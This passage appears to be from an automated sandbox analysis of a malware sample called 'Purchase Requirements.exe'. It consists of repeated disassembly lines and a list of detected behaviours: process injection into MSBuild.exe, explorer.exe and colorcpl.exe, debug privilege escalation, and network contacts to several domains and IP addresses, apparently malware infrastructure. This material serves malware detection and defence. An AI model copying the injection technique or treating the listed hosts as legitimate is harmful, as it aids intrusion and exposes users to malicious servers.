Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0443746D mov eax, dword ptr fs:[00000030h] 15_2_0443746D
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044E1074 mov eax, dword ptr fs:[00000030h] 15_2_044E1074
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044D2073 mov eax, dword ptr fs:[00000030h] 15_2_044D2073
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044E740D mov eax, dword ptr fs:[00000030h] 15_2_044E740D
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044E740D mov eax, dword ptr fs:[00000030h] 15_2_044E740D
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044E740D mov eax, dword ptr fs:[00000030h] 15_2_044E740D
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04496C0A mov eax, dword ptr fs:[00000030h] 15_2_04496C0A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04496C0A mov eax, dword ptr fs:[00000030h] 15_2_04496C0A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04496C0A mov eax, dword ptr fs:[00000030h] 15_2_04496C0A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04496C0A mov eax, dword ptr fs:[00000030h] 15_2_04496C0A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044D1C06 mov eax, dword ptr fs:[00000030h] 15_2_044D1C06
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044D1C06 mov eax, dword ptr fs:[00000030h] 15_2_044D1C06
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044D1C06 mov eax, dword ptr fs:[00000030h] 15_2_044D1C06
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044D1C06 mov eax, dword ptr fs:[00000030h] 15_2_044D1C06
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044D1C06 mov eax, dword ptr fs:[00000030h] 15_2_044D1C06
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044D1C06 mov eax, dword ptr fs:[00000030h] 15_2_044D1C06
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044D1C06 mov eax, dword ptr fs:[00000030h] 15_2_044D1C06
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044D1C06 mov eax, dword ptr fs:[00000030h] 15_2_044D1C06
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044D1C06 mov eax, dword ptr fs:[00000030h] 15_2_044D1C06
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044D1C06 mov eax, dword ptr fs:[00000030h] 15_2_044D1C06
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044D1C06 mov eax, dword ptr fs:[00000030h] 15_2_044D1C06
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044D1C06 mov eax, dword ptr fs:[00000030h] 15_2_044D1C06
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044D1C06 mov eax, dword ptr fs:[00000030h] 15_2_044D1C06
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044D1C06 mov eax, dword ptr fs:[00000030h] 15_2_044D1C06
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044E4015 mov eax, dword ptr fs:[00000030h] 15_2_044E4015
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044E4015 mov eax, dword ptr fs:[00000030h] 15_2_044E4015
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04497016 mov eax, dword ptr fs:[00000030h] 15_2_04497016
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04497016 mov eax, dword ptr fs:[00000030h] 15_2_04497016
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04497016 mov eax, dword ptr fs:[00000030h] 15_2_04497016
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0442B02A mov eax, dword ptr fs:[00000030h] 15_2_0442B02A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0442B02A mov eax, dword ptr fs:[00000030h] 15_2_0442B02A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0442B02A mov eax, dword ptr fs:[00000030h] 15_2_0442B02A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0442B02A mov eax, dword ptr fs:[00000030h] 15_2_0442B02A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0444BC2C mov eax, dword ptr fs:[00000030h] 15_2_0444BC2C
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044E8CD6 mov eax, dword ptr fs:[00000030h] 15_2_044E8CD6
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044AB8D0 mov eax, dword ptr fs:[00000030h] 15_2_044AB8D0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044AB8D0 mov ecx, dword ptr fs:[00000030h] 15_2_044AB8D0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044AB8D0 mov eax, dword ptr fs:[00000030h] 15_2_044AB8D0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044AB8D0 mov eax, dword ptr fs:[00000030h] 15_2_044AB8D0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044AB8D0 mov eax, dword ptr fs:[00000030h] 15_2_044AB8D0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044AB8D0 mov eax, dword ptr fs:[00000030h] 15_2_044AB8D0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044D14FB mov eax, dword ptr fs:[00000030h] 15_2_044D14FB
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04496CF0 mov eax, dword ptr fs:[00000030h] 15_2_04496CF0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04496CF0 mov eax, dword ptr fs:[00000030h] 15_2_04496CF0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04496CF0 mov eax, dword ptr fs:[00000030h] 15_2_04496CF0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04419080 mov eax, dword ptr fs:[00000030h] 15_2_04419080
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04493884 mov eax, dword ptr fs:[00000030h] 15_2_04493884
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04493884 mov eax, dword ptr fs:[00000030h] 15_2_04493884
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0442849B mov eax, dword ptr fs:[00000030h] 15_2_0442849B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044590AF mov eax, dword ptr fs:[00000030h] 15_2_044590AF
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0444F0BF mov ecx, dword ptr fs:[00000030h] 15_2_0444F0BF
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0444F0BF mov eax, dword ptr fs:[00000030h] 15_2_0444F0BF
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0444F0BF mov eax, dword ptr fs:[00000030h] 15_2_0444F0BF
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04453D43 mov eax, dword ptr fs:[00000030h] 15_2_04453D43
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0443B944 mov eax, dword ptr fs:[00000030h] 15_2_0443B944
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0443B944 mov eax, dword ptr fs:[00000030h] 15_2_0443B944
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04493540 mov eax, dword ptr fs:[00000030h] 15_2_04493540
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04437D50 mov eax, dword ptr fs:[00000030h] 15_2_04437D50
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0441C962 mov eax, dword ptr fs:[00000030h] 15_2_0441C962
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0441B171 mov eax, dword ptr fs:[00000030h] 15_2_0441B171
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0441B171 mov eax, dword ptr fs:[00000030h] 15_2_0441B171
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0443C577 mov eax, dword ptr fs:[00000030h] 15_2_0443C577
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0443C577 mov eax, dword ptr fs:[00000030h] 15_2_0443C577
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04419100 mov eax, dword ptr fs:[00000030h] 15_2_04419100
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04419100 mov eax, dword ptr fs:[00000030h] 15_2_04419100
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04419100 mov eax, dword ptr fs:[00000030h] 15_2_04419100
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04434120 mov eax, dword ptr fs:[00000030h] 15_2_04434120
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04434120 mov eax, dword ptr fs:[00000030h] 15_2_04434120
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04434120 mov eax, dword ptr fs:[00000030h] 15_2_04434120
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04434120 mov eax, dword ptr fs:[00000030h] 15_2_04434120
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04434120 mov ecx, dword ptr fs:[00000030h] 15_2_04434120
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0441AD30 mov eax, dword ptr fs:[00000030h] 15_2_0441AD30
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04423D34 mov eax, dword ptr fs:[00000030h] 15_2_04423D34
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04423D34 mov eax, dword ptr fs:[00000030h] 15_2_04423D34
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04423D34 mov eax, dword ptr fs:[00000030h] 15_2_04423D34
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04423D34 mov eax, dword ptr fs:[00000030h] 15_2_04423D34
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04423D34 mov eax, dword ptr fs:[00000030h] 15_2_04423D34
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04423D34 mov eax, dword ptr fs:[00000030h] 15_2_04423D34
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04423D34 mov eax, dword ptr fs:[00000030h] 15_2_04423D34
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04423D34 mov eax, dword ptr fs:[00000030h] 15_2_04423D34
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04423D34 mov eax, dword ptr fs:[00000030h] 15_2_04423D34
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04423D34 mov eax, dword ptr fs:[00000030h] 15_2_04423D34
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04423D34 mov eax, dword ptr fs:[00000030h] 15_2_04423D34
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04423D34 mov eax, dword ptr fs:[00000030h] 15_2_04423D34
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04423D34 mov eax, dword ptr fs:[00000030h] 15_2_04423D34
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044E8D34 mov eax, dword ptr fs:[00000030h] 15_2_044E8D34
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0444513A mov eax, dword ptr fs:[00000030h] 15_2_0444513A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0444513A mov eax, dword ptr fs:[00000030h] 15_2_0444513A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0449A537 mov eax, dword ptr fs:[00000030h] 15_2_0449A537
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04444D3B mov eax, dword ptr fs:[00000030h] 15_2_04444D3B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04444D3B mov eax, dword ptr fs:[00000030h] 15_2_04444D3B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04444D3B mov eax, dword ptr fs:[00000030h] 15_2_04444D3B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0441B1E1 mov eax, dword ptr fs:[00000030h] 15_2_0441B1E1
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0441B1E1 mov eax, dword ptr fs:[00000030h] 15_2_0441B1E1
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0441B1E1 mov eax, dword ptr fs:[00000030h] 15_2_0441B1E1
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044A41E8 mov eax, dword ptr fs:[00000030h] 15_2_044A41E8
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0442D5E0 mov eax, dword ptr fs:[00000030h] 15_2_0442D5E0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0442D5E0 mov eax, dword ptr fs:[00000030h] 15_2_0442D5E0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044C8DF1 mov eax, dword ptr fs:[00000030h] 15_2_044C8DF1
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0444A185 mov eax, dword ptr fs:[00000030h] 15_2_0444A185
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0443C182 mov eax, dword ptr fs:[00000030h] 15_2_0443C182
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04412D8A mov eax, dword ptr fs:[00000030h] 15_2_04412D8A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04412D8A mov eax, dword ptr fs:[00000030h] 15_2_04412D8A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04412D8A mov eax, dword ptr fs:[00000030h] 15_2_04412D8A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04412D8A mov eax, dword ptr fs:[00000030h] 15_2_04412D8A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04412D8A mov eax, dword ptr fs:[00000030h] 15_2_04412D8A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0444FD9B mov eax, dword ptr fs:[00000030h] 15_2_0444FD9B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0444FD9B mov eax, dword ptr fs:[00000030h] 15_2_0444FD9B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044461A0 mov eax, dword ptr fs:[00000030h] 15_2_044461A0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044461A0 mov eax, dword ptr fs:[00000030h] 15_2_044461A0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044435A1 mov eax, dword ptr fs:[00000030h] 15_2_044435A1
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04441DB5 mov eax, dword ptr fs:[00000030h] 15_2_04441DB5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04441DB5 mov eax, dword ptr fs:[00000030h] 15_2_04441DB5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04441DB5 mov eax, dword ptr fs:[00000030h] 15_2_04441DB5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04419240 mov eax, dword ptr fs:[00000030h] 15_2_04419240
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04419240 mov eax, dword ptr fs:[00000030h] 15_2_04419240
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04419240 mov eax, dword ptr fs:[00000030h] 15_2_04419240
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04419240 mov eax, dword ptr fs:[00000030h] 15_2_04419240
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04427E41 mov eax, dword ptr fs:[00000030h] 15_2_04427E41
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04427E41 mov eax, dword ptr fs:[00000030h] 15_2_04427E41
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04427E41 mov eax, dword ptr fs:[00000030h] 15_2_04427E41
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04427E41 mov eax, dword ptr fs:[00000030h] 15_2_04427E41
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04427E41 mov eax, dword ptr fs:[00000030h] 15_2_04427E41
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04427E41 mov eax, dword ptr fs:[00000030h] 15_2_04427E41
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044A4257 mov eax, dword ptr fs:[00000030h] 15_2_044A4257
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044CB260 mov eax, dword ptr fs:[00000030h] 15_2_044CB260
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044CB260 mov eax, dword ptr fs:[00000030h] 15_2_044CB260
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044E8A62 mov eax, dword ptr fs:[00000030h] 15_2_044E8A62
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0442766D mov eax, dword ptr fs:[00000030h] 15_2_0442766D
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0443AE73 mov eax, dword ptr fs:[00000030h] 15_2_0443AE73
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0443AE73 mov eax, dword ptr fs:[00000030h] 15_2_0443AE73
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0443AE73 mov eax, dword ptr fs:[00000030h] 15_2_0443AE73
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0443AE73 mov eax, dword ptr fs:[00000030h] 15_2_0443AE73
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0443AE73 mov eax, dword ptr fs:[00000030h] 15_2_0443AE73
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0445927A mov eax, dword ptr fs:[00000030h] 15_2_0445927A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0441C600 mov eax, dword ptr fs:[00000030h] 15_2_0441C600
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0441C600 mov eax, dword ptr fs:[00000030h] 15_2_0441C600
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0441C600 mov eax, dword ptr fs:[00000030h] 15_2_0441C600
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04448E00 mov eax, dword ptr fs:[00000030h] 15_2_04448E00
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04428A0A mov eax, dword ptr fs:[00000030h] 15_2_04428A0A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0444A61C mov eax, dword ptr fs:[00000030h] 15_2_0444A61C
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0444A61C mov eax, dword ptr fs:[00000030h] 15_2_0444A61C
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04433A1C mov eax, dword ptr fs:[00000030h] 15_2_04433A1C
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0441E620 mov eax, dword ptr fs:[00000030h] 15_2_0441E620
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044CFE3F mov eax, dword ptr fs:[00000030h] 15_2_044CFE3F
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04458EC7 mov eax, dword ptr fs:[00000030h] 15_2_04458EC7
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044436CC mov eax, dword ptr fs:[00000030h] 15_2_044436CC
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044CFEC0 mov eax, dword ptr fs:[00000030h] 15_2_044CFEC0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044E8ED6 mov eax, dword ptr fs:[00000030h] 15_2_044E8ED6
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044276E2 mov eax, dword ptr fs:[00000030h] 15_2_044276E2
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044416E0 mov ecx, dword ptr fs:[00000030h] 15_2_044416E0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044AFE87 mov eax, dword ptr fs:[00000030h] 15_2_044AFE87
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0444D294 mov eax, dword ptr fs:[00000030h] 15_2_0444D294
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0444D294 mov eax, dword ptr fs:[00000030h] 15_2_0444D294
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044152A5 mov eax, dword ptr fs:[00000030h] 15_2_044152A5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044152A5 mov eax, dword ptr fs:[00000030h] 15_2_044152A5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044152A5 mov eax, dword ptr fs:[00000030h] 15_2_044152A5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044152A5 mov eax, dword ptr fs:[00000030h] 15_2_044152A5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044152A5 mov eax, dword ptr fs:[00000030h] 15_2_044152A5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044E0EA5 mov eax, dword ptr fs:[00000030h] 15_2_044E0EA5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044E0EA5 mov eax, dword ptr fs:[00000030h] 15_2_044E0EA5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044E0EA5 mov eax, dword ptr fs:[00000030h] 15_2_044E0EA5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044946A7 mov eax, dword ptr fs:[00000030h] 15_2_044946A7
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0442AAB0 mov eax, dword ptr fs:[00000030h] 15_2_0442AAB0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0442AAB0 mov eax, dword ptr fs:[00000030h] 15_2_0442AAB0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0444FAB0 mov eax, dword ptr fs:[00000030h] 15_2_0444FAB0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0441DB40 mov eax, dword ptr fs:[00000030h] 15_2_0441DB40
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0442EF40 mov eax, dword ptr fs:[00000030h] 15_2_0442EF40
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044E8B58 mov eax, dword ptr fs:[00000030h] 15_2_044E8B58
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0441F358 mov eax, dword ptr fs:[00000030h] 15_2_0441F358
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0441DB60 mov ecx, dword ptr fs:[00000030h] 15_2_0441DB60
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0442FF60 mov eax, dword ptr fs:[00000030h] 15_2_0442FF60
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044E8F6A mov eax, dword ptr fs:[00000030h] 15_2_044E8F6A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04443B7A mov eax, dword ptr fs:[00000030h] 15_2_04443B7A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04443B7A mov eax, dword ptr fs:[00000030h] 15_2_04443B7A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044E070D mov eax, dword ptr fs:[00000030h] 15_2_044E070D
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044E070D mov eax, dword ptr fs:[00000030h] 15_2_044E070D
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0444A70E mov eax, dword ptr fs:[00000030h] 15_2_0444A70E
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0444A70E mov eax, dword ptr fs:[00000030h] 15_2_0444A70E
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0443F716 mov eax, dword ptr fs:[00000030h] 15_2_0443F716
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044D131B mov eax, dword ptr fs:[00000030h] 15_2_044D131B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044AFF10 mov eax, dword ptr fs:[00000030h] 15_2_044AFF10
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044AFF10 mov eax, dword ptr fs:[00000030h] 15_2_044AFF10
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04414F2E mov eax, dword ptr fs:[00000030h] 15_2_04414F2E
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04414F2E mov eax, dword ptr fs:[00000030h] 15_2_04414F2E
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0444E730 mov eax, dword ptr fs:[00000030h] 15_2_0444E730
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044537F5 mov eax, dword ptr fs:[00000030h] 15_2_044537F5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044D138A mov eax, dword ptr fs:[00000030h] 15_2_044D138A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044CD380 mov ecx, dword ptr fs:[00000030h] 15_2_044CD380
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04421B8F mov eax, dword ptr fs:[00000030h] 15_2_04421B8F
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04421B8F mov eax, dword ptr fs:[00000030h] 15_2_04421B8F
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0444B390 mov eax, dword ptr fs:[00000030h] 15_2_0444B390
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04428794 mov eax, dword ptr fs:[00000030h] 15_2_04428794
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04497794 mov eax, dword ptr fs:[00000030h] 15_2_04497794
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04497794 mov eax, dword ptr fs:[00000030h] 15_2_04497794
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04497794 mov eax, dword ptr fs:[00000030h] 15_2_04497794
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044E5BA5 mov eax, dword ptr fs:[00000030h] 15_2_044E5BA5
Enables debug privileges
Source: C:\Users\user\Desktop\Purchase Requirements.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.mariasmoworldwide.com
Source: C:\Windows\explorer.exe Network Connect: 217.160.0.129 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 160.153.136.3 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 23.227.38.74 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.thefitflect.com
Source: C:\Windows\explorer.exe Network Connect: 162.241.85.227 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 74.208.236.212 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.goldenstatelabradoodles.com
Source: C:\Windows\explorer.exe Domain query: www.narrowpathwc.com
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.braun-mathematik.online
Source: C:\Windows\explorer.exe Domain query: www.mynjelderlaw.com
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\Purchase Requirements.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: unknown target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: unknown target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread register set: target process: 3424 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread register set: target process: 3424 Jump to behavior
